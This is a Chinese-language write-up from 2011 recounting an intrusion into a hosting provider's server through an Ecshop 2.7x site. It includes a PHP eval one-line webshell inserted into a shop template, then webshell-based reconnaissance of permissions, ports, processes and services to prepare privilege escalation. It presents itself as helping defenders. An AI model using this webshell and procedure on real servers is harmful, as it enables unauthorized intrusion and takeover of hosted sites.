检测某IDC服务器 从入侵提权谈主机防御
时间:2011-01-09 来源:过客
图文:黑白前线/udb311
主题:检测某IDC服务器 从入侵提权谈主机防御
前言:记录一次检测网站拿下服务器的检测报告。写出此文仅供参考,以便更好的防范入侵。
目标服务器:Windows2003+iis6+php+mysql+mssql+serv-u
目标网站:Ecshop2.7x
提权:
通常步骤
1、 上传asp webshell检测可用组件,端口,目录。
2、 上传aspx webhsell 测试执行命令,获取进程、服务、端口信息
入手
Echop2.7x暴过几个注入,很容易取到后台登录密码。
这个利用方法百度都有,不在一一描述。
后台Getshell,也有很多方法。这里用到模块管理-库项目管理-选择myship.lbi里插入<?php eval($_POST['c'])?>
连接http://site/myship.php一句话
信息收集
一、 检测权限
1. 先php shell检测服务器上的目录浏览权限,D:/wwwroot/xxx/wwwroot/可以看出是IDC管理网站的做法,独立用户单独权限处理当前用户无法跳转跨目录。
另外,C D E F盘都无浏览权限。因为PHP和ASP继承的是IIS用户的权限,所以都不能列出目录。
2. 列出程序目录,如图
360、Microsoft SQL Server先想到两种提权方法
二、 检测目标服务
上传asp shell检测服务器组件
1. wscript.shell × 命令行执行组件 不支持
2. 常用端口
127.0.0.1:1433.........开放
127.0.0.1:3389.........关闭
127.0.0.1:43958.........开放
3. C:\Documents and Settings\All Users\ 无权限访问
C:\Documents and Settings\All Users\「开始」菜单\程序\ 无权限访问
C:\Documents and Settings\All Users\Documents\ 可读取写入
4.查看系统服务-用户账号 对象不支持此属性或方法(禁用了Workstation)
5. 查看管理员 他奶奶的不行啊:Wscript.Network (禁用了Wscript.Network)
上传aspx shell检测服务器可执行命令
1. ASPX继承users组权限,对C D E F盘都无浏览权限。
2. 默认调用 c:\windows\system32\cmd.exe无权访问。
3. IIS SPY可列IIS用户、密码、域名以及本地路径。
4. Process列出进程,可利用如下
1 1176 hzclient 华众主机客户端
12 1588 r_server Radmin控制服务端
18 10660 shstat mcafee杀毒
55 3548 SERVUTRAY serv-u服务端
73 10892 mysqld mysql数据库
5. Services列出服务,可利用如下
29 1176 HZCLIENT D:\hzhost\hzclient.exe
72 1588 r_server "C:\WINDOWS\system32\r_server.exe" /service
41 1312 McShield "C:\Program Files\McAfee\VirusScan Enterprise\Mcshield.exe"
50 10892 MySQL51 "E:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld" --defaults-file="E:\Program Files\MySQL\MySQL Server 5.1\my.ini" MySQL51
79 5708 Serv-U E:\program files\Serv-U\ServUDaemon.exe
标签分类: